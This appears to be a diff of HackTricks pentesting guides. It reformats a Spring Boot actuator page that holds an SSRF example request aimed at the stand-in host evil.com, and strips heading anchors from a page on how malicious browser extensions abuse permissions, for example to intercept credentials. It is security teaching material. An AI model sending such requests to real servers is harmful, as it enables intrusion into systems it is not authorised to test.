f

src/network-services-pentesting/pentesting-web/spring-actuators.md

@@ -52,16 +52,16 @@
 
 1.  **Env + H2 RCE**:
     - Details on exploiting the combination of `/env` endpoint and H2 database can be found [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
+
 2.  **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
+   - The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
+   - Example exploit request:
 
-        - The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
-        - Example exploit request:
-
-                 ```http
-                 GET ;@evil.com/url HTTP/1.1
-                 Host: target.com
-                 Connection: close
-                 ```
+```http
+GET ;@evil.com/url HTTP/1.1
+Host: target.com
+Connection: close
+```
 
     {{#include ../../banners/hacktricks-training.md}}
 

src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md

@@ -59,7 +59,7 @@ Both APIs allow executing not merely files contained in the extensions as conten
 > [!CAUTION]
 > In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers.
 
-### Implicit privileges <a href="#implicit-privileges" id="implicit-privileges"></a>
+### Implicit privileges
 
 Some extension privileges **don’t have to be explicitly declared**. One example is the [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely won’t know which website these tabs correspond with.
 
@@ -72,7 +72,7 @@ If you look through possible `tabs.create()` parameters, you’ll also notice th
 
 [**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is very similar to `tabs.create()` but will **modify an existing tab**. So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well.
 
-### Webcam, geolocation and friends <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
+### Webcam, geolocation and friends
 
 You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). It’s features with considerable potential for abuse, so users each time have to confirm that they still want this.
 
@@ -87,7 +87,7 @@ Adding the **`history`** keyword to the [permissions entry](https://developer.mo
 
 The **`bookmarks`** **permission** has similar abuse potential, this one allows **reading out all bookmarks via the** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks).
 
-### Storage permission <a href="#the-storage-permission" id="the-storage-permission"></a>
+### Storage permission
 
 The extension storage is merely a key-value collection, very similar to [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) that any website could use. So no sensitive information should be stored here.